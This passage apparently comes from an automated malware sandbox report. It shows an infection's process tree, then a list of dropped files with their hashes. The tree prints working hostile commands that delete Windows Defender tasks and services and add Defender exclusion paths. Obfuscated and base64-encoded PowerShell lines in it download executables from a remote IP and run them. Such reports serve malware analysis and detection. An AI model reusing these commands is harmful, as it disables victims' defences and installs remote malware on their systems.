                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                            11⤵
                                                              PID:5220
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                              11⤵
                                                                PID:2536
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                11⤵
                                                                  PID:5256
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                  11⤵
                                                                    PID:5412
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                    11⤵
                                                                      PID:2932
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc stop ddrver
                                                                      11⤵
                                                                      • Launches sc.exe
                                                                      PID:5604
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc delete ddrver
                                                                      11⤵
                                                                      • Launches sc.exe
                                                                      PID:6136
                                                          • C:\Users\Admin\AppData\Local\Temp\10408370101\760bf5946f.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408370101\760bf5946f.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:5776
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2336
                                                          • C:\Users\Admin\AppData\Local\Temp\10408380101\04214d2864.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408380101\04214d2864.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6008
                                                          • C:\Users\Admin\AppData\Local\Temp\10408390101\60578b2a60.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408390101\60578b2a60.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2480
                                                          • C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:5840
                                                          • C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5972
                                                          • C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe"
                                                            6⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6184
                                                            • C:\Windows\SysWOW64\CMD.exe
                                                              "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6856
                                                          • C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:7020
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                              7⤵
                                                                PID:6444
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                  8⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:5584
                                                              • C:\Windows\system32\svchost.exe
                                                                "C:\Windows\system32\svchost.exe"
                                                                7⤵
                                                                  PID:6644
                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                      1⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2224
                                                    • C:\Windows\system32\msiexec.exe
                                                      C:\Windows\system32\msiexec.exe /V
                                                      1⤵
                                                      • Enumerates connected drives
                                                      • Drops file in Windows directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1952
                                                      • C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe
                                                        "C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4656
                                                        • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                          C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:2480
                                                          • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                            C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                            4⤵
                                                            • Checks computer location settings
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1204
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
                                                              5⤵
                                                              • Blocklisted process makes network request
                                                              • Downloads MZ/PE file
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4308
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\SysWOW64\cmd.exe
                                                            4⤵
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3124
                                                      • C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1244
                                                        • C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                          C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:4912
                                                          • C:\Windows\System32\cmd.exe
                                                            C:\Windows\System32\cmd.exe
                                                            4⤵
                                                              PID:5016
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\SysWOW64\cmd.exe
                                                              4⤵
                                                              • Drops file in Windows directory
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3652
                                                        • C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:916
                                                          • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                            C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:3852
                                                            • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                              C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                              4⤵
                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5068
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\SysWOW64\cmd.exe
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6840
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1648 -ip 1648
                                                        1⤵
                                                          PID:1528
                                                        • C:\ProgramData\Avex Designs\Updater.exe
                                                          "C:\ProgramData\Avex Designs\Updater.exe" /u
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Drops file in System32 directory
                                                          • Checks processor information in registry
                                                          • Modifies data under HKEY_USERS
                                                          PID:4236
                                                          • C:\Windows\TEMP\dat2C08.tmp\dat2C09.exe
                                                            C:\Windows\TEMP\dat2C08.tmp\dat2C09.exe
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Drops file in System32 directory
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies data under HKEY_USERS
                                                            PID:216
                                                            • C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe
                                                              "C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in System32 directory
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6772
                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                C:\Windows\system32\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of SetThreadContext
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:2868
                                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                  5⤵
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:6280
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
                                                                    6⤵
                                                                    • Blocklisted process makes network request
                                                                    • Downloads MZ/PE file
                                                                    • Drops file in System32 directory
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:5304
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\SysWOW64\cmd.exe
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5724
                                                          • C:\Windows\TEMP\dat90FD.tmp\dat90FE.exe
                                                            C:\Windows\TEMP\dat90FD.tmp\dat90FE.exe
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Drops file in System32 directory
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies data under HKEY_USERS
                                                            PID:3012
                                                            • C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe
                                                              "C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in System32 directory
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2332
                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
                                                                C:\Windows\system32\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:6928
                                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4844
                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4408
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAcAByAGUARgBlAFIAZQBuAEMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAE4AcABhAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAEkAbgB2AGEAbABpAGQAXABIAGUAbABwAEwAaQBuAGsALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYATwBSAEMAZQA7ACAAYQBEAGQALQBNAFAAcAByAEUARgBFAFIARQBOAEMARQAgAC0AZQBYAEMAbABVAFMAaQBvAG4AUAByAE8AYwBFAHMAUwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBJAG4AdgBhAGwAaQBkAFwASABlAGwAcABMAGkAbgBrAC4AZQB4AGUAIAAtAGYAbwBSAEMAZQA=
                                                          1⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:5764
                                                        • C:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exe
                                                          C:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:3036
                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:4812
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                          1⤵
                                                            PID:4592
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                            1⤵
                                                              PID:4944

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Config.Msi\e58946e.rbs

                                                              Filesize

                                                              9KB

                                                              MD5

                                                              634a3d1cb05ccd082aef90fb0378a34b

                                                              SHA1

                                                              486dbc2225584ad1e2d2990dcebd9563f7fcd426

                                                              SHA256

                                                              15001dbfc4dec8bbef47b22f87d69b527511333efe9ac018324c08128e6e76d5

                                                              SHA512

                                                              8324cfe79aece3c9f8c4923553d0c85cff527020b413b7df544a20b8451b957d22fe9c22c8499ce786c07aa85f63f105b1bc026e3dcc912c3a0fa91bd93e42a8

                                                            • C:\Config.Msi\e589473.rbs

                                                              Filesize

                                                              9KB

                                                              MD5

                                                              5c5ab2d70242c046bc4e2f2a058818b0

                                                              SHA1

                                                              83d036b68d95a046f2cd2edba312e4e7a5c8f1bd

                                                              SHA256

                                                              4c014ce4fad2b181810a3f1d26a8c9cc0983b6f39e9779b9279b2bb4a94f88d8

                                                              SHA512

                                                              3fad698fb25faf65d35825b502c48c279ba72afbefc809ee692e0e511dabf24fcbe28c4eedce9cd15ff94982f353863e10121bfd45bceae9b0e05e4458871cb2

                                                            • C:\Config.Msi\e589478.rbs

                                                              Filesize

                                                              9KB

                                                              MD5

                                                              14155ace50cc8d27a25964800ab8670d

                                                              SHA1

                                                              0f89f6d1d1d671a72482f655d840d08b0e3632fe

                                                              SHA256

                                                              6b44382b9b5bbdd971d0cae2bf8100520aeb45b7f2512bd0ae69dba5567be0c7

                                                              SHA512

                                                              a530550b70b032cfbf03ca1da8019f14b9acc91e6e9bc48900e4359eed748364ca8b7045a88956c7c74ea216f3407d4e50b34f51d6865eaf4ad22861ed6e3b2c

                                                            • C:\Users\Admin\Abspawnhlp.exe

                                                              Filesize

                                                              27KB

                                                              MD5

                                                              5b8fb06983be9063ef128fa5aee80b3a

                                                              SHA1

                                                              c065a0ee84eb1fd646ea213bca20543306d7c9e1

                                                              SHA256

                                                              ab5b956eca5ce83bf763d5f952316f17ba771adfd5cafd8ca9e262de61de4b4e

                                                              SHA512

                                                              868cfbf9dd0a4ea9ececb290fa149959416ee2720c09e5bb8722cd1863626794afc2d5770e9244ba4e64b8e88c76e22e13af37aa42d745e1dbff4104258c8da2

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              986ac17969db43bbe96e25fd2757d887

                                                              SHA1

                                                              884f4d389ea36b9ba62fd3553be15eaf444676c9

                                                              SHA256

                                                              2a782b9a023e9f4f71f8909d451bba96b4c623acb11215c86c188334318d9e42

                                                              SHA512

                                                              8bf1114dcaebdeecbe655af0a0d40643d872959c04ca2e8ac793183e35d0b85774c564ec135a941a5c9bbef52219d91db4141bf5a5a45b78bd9f08afdbbaaac0

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BF4A23BF936A851ECBACCE498A36771

                                                              Filesize

                                                              471B

                                                              MD5

                                                              d7f78ed9a24818f8728be2320feec294

                                                              SHA1

                                                              49cfbf9a9240e35db90e7f6aa2b5b615eaf1e189

                                                              SHA256

                                                              842d658bb70521d0042f091ddf5f5b539f15002e75f49be0f082918bead47b2e

                                                              SHA512

                                                              3811181f1e7e8d033862c1296af6eeaf64917666377490a008ab987a4eb5bf5060be41e2e330b951bb1a369019ed390a37c8dba0253c19f4f1b045b4ea4d46cc

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              99d2d513adeb4532b2898717af428b0a

                                                              SHA1

                                                              a715ed08c0ca03ee1347d22592c34a1982277182

                                                              SHA256

                                                              517fe0d8c0a7f932a839c12292113407f111d5224e5f54a06f2d03f56a375138

                                                              SHA512

                                                              50bd5f783b7d690c0573c66f403b1da2dd961625a41bfa7ca2316a214a5137218e3258d60f612f455a55cca834ed641f876b1d9f7609810484c95160a3bbaf7c

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

                                                              Filesize

                                                              488B

                                                              MD5

                                                              b42427c2311f383fb5e411907aea2546

                                                              SHA1

                                                              1e5944ee6853a40e72b600e5c55f2f98909b84ce

                                                              SHA256

                                                              43a7d71321dfc2d3ecc0de3ca3670c20567c1cb12cf21d01ab2e885e099e8cfe

                                                              SHA512

                                                              d2054e05439910c17c9c75846d781c80fa3d26897f9bfa0df7b6232337f3edd492f25fe555c43ef15166f0c68d9da14b886ff426bb9004e8e54a2f5b79b4499f

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BF4A23BF936A851ECBACCE498A36771

                                                              Filesize

                                                              480B

                                                              MD5

                                                              21799f12fdf4b3e6fe683d758f8cdc6f

                                                              SHA1

                                                              e724ec670bea9975305866534601c242c29fd51d

                                                              SHA256

                                                              5807243ea7d8248303091da597dbe0ebdf3f362063a9cdf706bcda2f46d99f9b

                                                              SHA512

                                                              ad6488c69902789ea750647f33cb3558e8c11316dfba6f2b94462496b4959b6a0ff84fdf451ac8bae3000a08ae1ef1e33da5fc28b6c364e0b1a3aef17a68c81e

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                              Filesize

                                                              482B

                                                              MD5

                                                              2fa2a5959cb354b5c4bb88ff1d970ca1

                                                              SHA1

                                                              d8f497d726b9bad2ed3cc4adeebc0a12c1cf0d7a

                                                              SHA256

                                                              d8b09983dfd01ee83d4423c557afce5d895fd6f1e527a7d6622a73f95cace87b

                                                              SHA512

                                                              c9e76f3e5718f94c35c12f4aa3c4ef09f392b32c37d1fffbaf7a9cf25e51494a41054404f9958f449eb4a909bf30607152812475882eafc38e31dea3051fc7ad

                                                            • C:\Users\Admin\AppData\Local\Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              89363702baffc3c9e2219601d92c6104

                                                              SHA1

                                                              115f0df9699058cc312f4a7a77c3fe7506c6e254

                                                              SHA256

                                                              f5a7d0fa5a45e86b4fa57d5e8bc6382cfa00ad5013c7f8ed3638e0af54189fd9

                                                              SHA512

                                                              ab61626e0defb8f2bcb8fccb37f51ded7e000fb244cd2e5d6c16531598e62c88f69deb077d4043ec8990cc7fe303b1b401874708f3643b17a1e5e6d68391f81d

                                                            • C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi

                                                              Filesize

                                                              2.0MB

                                                              MD5

                                                              869e91e568e087f0bb5b83316615fe25

                                                              SHA1

                                                              d270c43ad104cecf8ac3c147ec9d38a26f690598

                                                              SHA256

                                                              2a776b45f044c0a4be9027f33b1548bfd78890db0b5c49dcb36026b0bf15a243

                                                              SHA512

                                                              e394d8e21ba720d962d55c2a55331c491583dba4d168a26335593ea4f279899fbcb4c39f43938c3ce22dfeda16b8685368b6f3398d5975ad7279314fd27018a6

                                                            • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe

                                                              Filesize

                                                              61KB

                                                              MD5

                                                              c7274a9e48f874a8c2d8c402d60cdf4d

                                                              SHA1

                                                              f9fce7ca9c4e9c5a0f8ed7fe812506809bb6f85b

                                                              SHA256

                                                              83577ba8c993c338671786fd5692e53080c87b9670ee8fda9cb163b689eb4ff9

                                                              SHA512

                                                              590bf5c61ed77540690a04b3b35bbaa1e996b911a00b638e866b6af82745b09877be76def1abcf05a8c4e9eb9ffdc34447860e628de9d518623c76eb493a9c61

                                                            • C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi

                                                              Filesize

                                                              4.1MB

                                                              MD5

                                                              421b1cb1b2830dc628fc8b76ea2be48c

                                                              SHA1

                                                              90fa3b66c69fac34dbcadc0514d8f903557072f2

                                                              SHA256

                                                              f310a87bc71c6b671666c6976a1477bd15bd00872b762cd02b290f7e1d760740

                                                              SHA512

                                                              f36ceffb435f32083fb5f355929ccd4f2bc8f3ac860674c1dadaa49f0f1a613a95efe8825d07147ff49211d60967792d79ab1c76fe3012daedefbb2d9ac6eca8

                                                            • C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe

                                                              Filesize

                                                              1.9MB

                                                              MD5

                                                              a4f54e52005dbec49fa78f924284eff0

                                                              SHA1

                                                              870069d51b1b6295357c68bdc7ca0773be9338d6

                                                              SHA256

                                                              b35a86b9177850090b13b226664dd6c3dfe4bd3014b0534fe15eda63fb44c433

                                                              SHA512

                                                              7c0c735389a6bdde2ce878c4d9f60c3f3eb327ff4247711756ad5927e294d604ffca12235daab6d0f2a61b10b8ef669e1c7a452bf604fca810d5bfd91d2da1b2

                                                            • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe

                                                              Filesize

                                                              2.2MB

                                                              MD5

                                                              fb5b1e8b265d9d1f567382122ad9aeb0

                                                              SHA1

                                                              d79d1fe809aa7f6ddafdc08f680def84f4dd8243

                                                              SHA256

                                                              e4211d0e545311bb60f65f15404c590ce1a0ef4db12ce470e492d7975d3e7b6d

                                                              SHA512

                                                              76d6f9c485f1fc64cdc08c26454ec85bdea0e2304de9676a8db0fe5fccc5fa96e220ec57080214bf1aeffa815c7ae9af12f1cc0cb46782d514d0a4baee5441b1

                                                            • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe

                                                              Filesize

                                                              1.9MB

                                                              MD5

                                                              e8acc9271d065ecd9b752568c7b0a9ea

                                                              SHA1

                                                              6a270b60ae8e6c1c125882d035f765fb57291c6a

                                                              SHA256

                                                              f07748fe482e9ddb045c6aaae08df35addab33a63e2cdff3ea6ec78b89cd5865

                                                              SHA512

                                                              a18c2dab0872d36df19f292857797fd9b3e56b92916ce494cdd41833ed50896bdae036d500fb47dd6cca7d4a970f29e6c03646798cf6192cc648eb63d1af090a

                                                            • C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe

                                                              Filesize

                                                              3.1MB

                                                              MD5

                                                              a20f8bef497bef5bc73d75f7b6a3508c

                                                              SHA1

                                                              90546154dc179b21c0fc716648207a79cb09b800

                                                              SHA256

                                                              fb20037526258b813f447841a4d2c63c9013ea852a5ca5587e3c3ea9cf5cbc57

                                                              SHA512

